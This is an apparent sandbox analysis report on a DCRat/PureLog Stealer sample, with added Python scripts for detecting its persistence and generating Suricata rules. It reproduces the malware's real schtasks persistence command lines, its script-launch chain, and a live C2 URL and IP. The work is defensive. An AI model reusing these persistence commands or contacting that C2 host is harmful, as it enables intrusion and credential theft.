
Windows Analysis Report
gorkmTnChA.exe

Overview

General Information

Sample name: gorkmTnChA.exe (renamed because the original name is a hash value)
Original sample name: E4E1923F51EB61ED20CBBFAB84AB25B5.exe
Analysis ID: 1570976
MD5: e4e1923f51eb61ed20cbbfab84ab25b5
SHA1: f50f90821c5e40a6b5289b8a0b084f831177cbef
SHA256: 093e2a0c52459c17133b8dce76c887d8eb3588f2fdfc7b1cfb342a7225b6cdd6
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Execution From GUID Like Folder Names
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Process Tree

  • System is w10x64
  • gorkmTnChA.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\gorkmTnChA.exe" MD5: E4E1923F51EB61ED20CBBFAB84AB25B5)
    • DCRatBuild.exe (PID: 3384 cmdline: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" MD5: A7645CAC446E39F9961F51E3BB1C0515)
      • wscript.exe (PID: 1748 cmdline: "C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7312 cmdline: C:\Windows\system32\cmd.exe /c ""C:\bridgeMonitorDhcpCommon\KQ5XnVOYWwQFrPTZ9PsIrToBZTIRzi3E3YTHck8Ca7MF45bBlpw.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • webDriverintoDll.exe (PID: 7364 cmdline: "C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe" MD5: 26C2B88440A62B4CB79201E01A404BD2)
            • schtasks.exe (PID: 7620 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7636 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7652 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7668 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7684 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7700 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7716 cmdline: schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7732 cmdline: schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7748 cmdline: schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7764 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 8 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7780 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7800 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 10 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7816 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7832 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7848 cmdline: schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7888 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 7940 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 7960 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
              • KAdpNCgonFhCnlBRasdZerWl.exe (PID: 8132 cmdline: "C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe" MD5: 26C2B88440A62B4CB79201E01A404BD2)
    • SandeLLoCHECKER_Installer.exe (PID: 6036 cmdline: "C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe" MD5: 8A0591A6B534E32FA179F2D781B79026)
      • msiexec.exe (PID: 5480 cmdline: "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733667848 " AI_FOUND_PREREQS=".NET Framework 4.8 (web installer)" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7076 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3804 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 26CF464DBA35F416758053A43B23FD3D C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7184 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 7BC9C83AA604E4F7E55BC37E42BF8976 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • KAdpNCgonFhCnlBRasdZerWl.exe (PID: 8000 cmdline: "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe" MD5: 26C2B88440A62B4CB79201E01A404BD2)
  • KAdpNCgonFhCnlBRasdZerWl.exe (PID: 8028 cmdline: "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe" MD5: 26C2B88440A62B4CB79201E01A404BD2)
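The tree above shows the behaviour that makes this build easy to spot from process-creation telemetry alone: for each of several copies of the implant, webDriverintoDll.exe registers one ONLOGON task and two MINUTE-interval tasks that all run the same binary, a .vbe is launched by WScript.exe from a folder directly under the drive root, and the batch stage uses `w32tm /stripchart /computer:localhost` as a sleep. The script below, an added example rather than anything from the report or the DCRat builder, runs those three checks over constructed process-creation records; the PIDs, parent PIDs and command lines are copied from the tree, while the record format, the `STANDARD_ROOTS` list and the finding names are assumptions of this example.

```python
"""Flag the DCRat-style persistence and delay pattern visible in the process tree.

Added example, not part of the Joe Sandbox report. EVENTS is a constructed
list of process-creation records whose PIDs, parent PIDs and command lines
are copied from the tree above; the detection heuristics are my own.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

EVENTS: List[Tuple[int, int, str]] = [  # (pid, parent pid, command line)
    (3384, 6524, r'"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"'),
    (1748, 3384, r'"C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe"'),
    (7364, 7312, r'"C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe"'),
    (7620, 7364, r'''schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /f'''),
    (7636, 7364, r'''schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f'''),
    (7652, 7364, r'''schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f'''),
    (7716, 7364, r'''schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /f'''),
    (7732, 7364, r'''schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f'''),
    (7748, 7364, r'''schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f'''),
    (7764, 7364, r'''schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 8 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /f'''),
    (7780, 7364, r'''schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f'''),
    (7800, 7364, r'''schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 10 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f'''),
    (7940, 7888, "chcp 65001"),
    (7960, 7888, "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"),
]

SCHTASKS_RE = re.compile(
    r'''schtasks(?:\.exe)?\s+/create\s+/tn\s+"(?P<tn>[^"]+)"\s+/sc\s+(?P<sc>\w+)'''
    r'''(?:\s+/mo\s+(?P<mo>\d+))?\s+/tr\s+"'?(?P<tr>[^'"]+)'?"(?P<rest>.*)$''', re.IGNORECASE)
# an .exe or script exactly one folder below the drive root, e.g. C:\bridgeMonitorDhcpCommon\x.exe
ROOT_EXE_RE = re.compile(r'^"?[a-z]:[\\/]([^\\/"]+)[\\/][^\\/"]+\.exe"?(?:\s|$)')
ROOT_SCRIPT_RE = re.compile(r'[a-z]:[\\/]([^\\/"]+)[\\/][^\\/"]+\.(?:vbe|vbs|js|jse|wsf)\b')
SCRIPT_HOST_RE = re.compile(r'^"?(?:[a-z]:[\\/](?:[^"\\/]+[\\/])*)?[wc]script\.exe"?\s')
W32TM_RE = re.compile(r'\bw32tm(?:\.exe)?\s+/stripchart\s+/computer:localhost\b')
STANDARD_ROOTS = {"windows", "program files", "program files (x86)", "users", "programdata"}  # assumed


@dataclass
class Finding:
    pids: List[int]
    kind: str
    detail: str


def parse_schtasks(cmd: str) -> Optional[Dict[str, object]]:
    """Return /tn, /sc, /mo, /tr and whether /rl HIGHEST was given, or None if not a /create."""
    m = SCHTASKS_RE.match(cmd.strip())
    if not m:
        return None
    return {"tn": m["tn"], "sc": m["sc"].upper(), "mo": m["mo"],
            "tr": m["tr"], "highest": "/rl highest" in m["rest"].lower()}


def persistence_clusters(events) -> Dict[str, List[Tuple[int, dict]]]:
    """Group schtasks /create commands by the binary they launch (case-insensitive path)."""
    by_target: Dict[str, List[Tuple[int, dict]]] = defaultdict(list)
    for pid, _ppid, cmd in events:
        task = parse_schtasks(cmd)
        if task:
            by_target[str(task["tr"]).lower()].append((pid, task))
    return by_target


def analyze(events) -> List[Finding]:
    findings: List[Finding] = []
    # one binary registered both at logon and on a minute interval: redundant persistence
    for target, tasks in persistence_clusters(events).items():
        schedules = {t["sc"] for _, t in tasks}
        if {"ONLOGON", "MINUTE"} <= schedules:
            findings.append(Finding([p for p, _ in tasks], "redundant-persistence",
                                    f"{len(tasks)} tasks ({'/'.join(sorted(schedules))}) run {target}"))
    for pid, _ppid, cmd in events:
        low = cmd.lower()
        if SCRIPT_HOST_RE.match(low):  # wscript/cscript running a script from a root-level folder
            m = ROOT_SCRIPT_RE.search(low)
            if m and m.group(1) not in STANDARD_ROOTS:
                findings.append(Finding([pid], "script-from-root-folder", m.group(0)))
        m = ROOT_EXE_RE.match(low)  # executable itself living in a root-level folder
        if m and m.group(1) not in STANDARD_ROOTS:
            findings.append(Finding([pid], "exe-from-root-folder", m.group(0)))
        if W32TM_RE.search(low):  # w32tm against localhost is a sleep, not time sync
            findings.append(Finding([pid], "w32tm-delay", "w32tm /stripchart used as a delay"))
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"{f.kind:24} pids={f.pids} {f.detail}")
```

The redundant-persistence check keys on the target binary rather than the task name, so the three differently named tasks per copy still cluster; the root-folder checks deliberately ignore anything under the standard Windows, Program Files, Users and ProgramData trees so that normal installers do not fire.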
Malware Configuration (DCRat)

{"C2 url": "http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Overview

Initial Sample
Source | Rule | Description | Author
gorkmTnChA.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
gorkmTnChA.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Dropped Files (9 entries in the full report; distinct entries of the first 5 shown)
Source | Rule | Description | Author
C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Users\Default\Favorites\ApplicationFrameHost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Users\Default\Favorites\ApplicationFrameHost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Memory Dumps (6 entries in the full report; first 5 shown)
Source | Rule | Description | Author
00000024.00000002.2899943903.00000000034E3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000000.00000003.1654559691.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000001.00000003.1656268229.00000000051CA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000001.00000003.1655715436.000000000688F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000000B.00000000.1775306001.00000000004E2000.00000002.00000001.01000000.00000015.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Unpacked PEs (15 entries in the full report; first 5 shown)
Source | Rule | Description | Author
1.3.DCRatBuild.exe.5218700.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
1.3.DCRatBuild.exe.5218700.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
11.0.webDriverintoDll.exe.4e0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
11.0.webDriverintoDll.exe.4e0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
1.3.DCRatBuild.exe.68dd700.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security

System Summary

Sigma rule match: Suspicious Execution From GUID Like Folder Names (author: Nasreddine Bencherchali (Nextron Systems))
  Process started: msiexec.exe (PID 5480), Image: C:\Windows\SysWOW64\msiexec.exe
  CommandLine: "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733667848 " AI_FOUND_PREREQS=".NET Framework 4.8 (web installer)"
  Parent: SandeLLoCHECKER_Installer.exe (PID 6036), ParentCommandLine: "C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe"

Sigma rule match: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript (author: Michael Haag)
  Process started: wscript.exe (PID 1748), Image: C:\Windows\SysWOW64\wscript.exe
  CommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe"
  Parent: DCRatBuild.exe (PID 3384), ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-08T15:27:23.309899+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 185.246.67.73 | 80 | TCP
2024-12-08T15:27:00.047076+0100 | 2829202 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 172.67.184.109 | 443 | TCP
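The extracted configuration and the two Suricata alerts together give the network side of this sample: the plain-HTTP beacon to 185.246.67.73 on port 80 is the C2 URL from the config, while the TLS connection to 172.67.184.109:443 is not named anywhere in the config. The script below, an added example and not tooling from the report, pulls the C2 indicators out of the configuration JSON, checks which alert destinations the configuration explains, and emits a Suricata rule for this build's panel path. The JSON and the alert values are copied from the report; the rule text, its msg, SID 9000001 and the choice to match only the first two URI segments are assumptions of this example.

```python
"""Turn the extracted DCRat configuration and the Suricata hits into IOCs and a rule.

Added example, not part of the report. CONFIG_JSON and ALERTS are copied from
the report above (alert rows re-typed as dicts); the Suricata rule text and
SID 9000001 are my own and assume Suricata 5+ sticky-buffer syntax.
"""
import json
from typing import Dict, Iterable, List
from urllib.parse import urlsplit

CONFIG_JSON = '''{"C2 url": "http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}'''

ALERTS = [  # constructed dicts; field values copied from the Suricata table above
    {"timestamp": "2024-12-08T15:27:23.309899+0100", "sid": 2048095, "severity": 1,
     "classtype": "A Network Trojan was detected", "src": "192.168.2.4", "sport": 49743,
     "dst": "185.246.67.73", "dport": 80, "proto": "TCP"},
    {"timestamp": "2024-12-08T15:27:00.047076+0100", "sid": 2829202, "severity": 1,
     "classtype": "A Network Trojan was detected", "src": "192.168.2.4", "sport": 49730,
     "dst": "172.67.184.109", "dport": 443, "proto": "TCP"},
]


def c2_indicators(config_json: str) -> Dict[str, object]:
    """Split the configured C2 URL into host, port and path for matching and blocking."""
    cfg = json.loads(config_json)
    u = urlsplit(cfg["C2 url"])
    return {"url": cfg["C2 url"], "scheme": u.scheme, "host": u.hostname,
            "port": u.port or (443 if u.scheme == "https" else 80), "path": u.path}


def alerts_to_host(alerts: Iterable[dict], host: str) -> List[dict]:
    """Alerts whose destination is the configured C2 host."""
    return [a for a in alerts if a["dst"] == host]


def unattributed(alerts: Iterable[dict], known_hosts: set) -> List[str]:
    """Destinations seen in alerts that the configuration does not explain."""
    return sorted({f'{a["dst"]}:{a["dport"]}' for a in alerts if a["dst"] not in known_hosts})


def suricata_rule(ind: Dict[str, object], sid: int) -> str:
    # The first two URI segments identify this build's panel path; matching the whole
    # 300-character URI would be brittle against trailing variation.
    prefix = "/" + "/".join(str(ind["path"]).split("/")[1:3]) + "/"
    return (f'alert http $HOME_NET any -> $EXTERNAL_NET any ('
            f'msg:"DCRat C2 beacon to {ind["host"]}"; flow:established,to_server; '
            f'http.host; content:"{ind["host"]}"; http.uri; content:"{prefix}"; startswith; '
            f'classtype:trojan-activity; sid:{sid}; rev:1;)')


if __name__ == "__main__":
    ind = c2_indicators(CONFIG_JSON)
    print("C2:", ind["host"], ind["port"], ind["path"][:40] + "...")
    print("alerts explained by config:", [a["sid"] for a in alerts_to_host(ALERTS, str(ind["host"]))])
    print("unattributed destinations:", unattributed(ALERTS, {ind["host"]}))
    print(suricata_rule(ind, 9000001))
```

Keeping the unattributed list separate matters for triage: the report records a JA3 fingerprint and a TLS 1.2 session to 172.67.184.109 but does not tie that host to the implant's configuration, so it should be treated as a lead rather than a confirmed C2.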


                                    AV Detection

Source: gorkmTnChA.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\Default\Favorites\ApplicationFrameHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\BXyiPEuJ.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\ClgJzaDG.log | Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Avira: detection malicious, Label: TR/Redcap.apero
Source: 0000000B.00000002.1853703523.0000000012EE9000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | ReversingLabs: Detection: 63%
Source: C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe | ReversingLabs: Detection: 63%
Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe | ReversingLabs: Detection: 63%
Source: C:\Users\Default\Favorites\ApplicationFrameHost.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\AOGsABiv.log | ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\BXyiPEuJ.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\GKQhrBJx.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\JrPikvxc.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\MAAYLQkP.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\OfhhMrNQ.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\UvPgJftz.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\XaQepXPR.log | ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\XgvwQtEs.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\ZkmfqpvS.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\aHPfiQDx.log | ReversingLabs: Detection: 20%
